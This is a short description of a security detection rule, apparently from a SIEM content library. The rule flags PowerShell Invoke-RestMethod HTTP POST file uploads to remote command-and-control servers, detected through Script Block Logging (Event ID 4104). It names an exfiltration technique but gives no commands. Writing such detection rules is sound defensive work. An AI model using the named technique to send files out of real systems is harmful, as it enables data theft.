This analytic rule detects potential data exfiltration through PowerShell's Invoke-RestMethod function. It specifically targets activity that involves uploading files via HTTP POST requests, which may signify that an attacker is transferring sensitive information such as files or screenshots to a remote command and control (C2) server. The rule utilizes PowerShell Script Block Logging (Event ID 4104) to identify these suspicious PowerShell script executions across systems. Given the nature of this activity, it raises significant concerns regarding data breaches and unauthorized access to sensitive data. The investigation of such anomalies is critical to mitigate the risks of data loss and system compromise. Proper implementation requires PowerShell Script Block Logging to be enabled on the relevant endpoints. This rule aims to enhance security monitoring, particularly in Windows environments, by providing timely alerts of potentially malicious file transfer attempts over the network.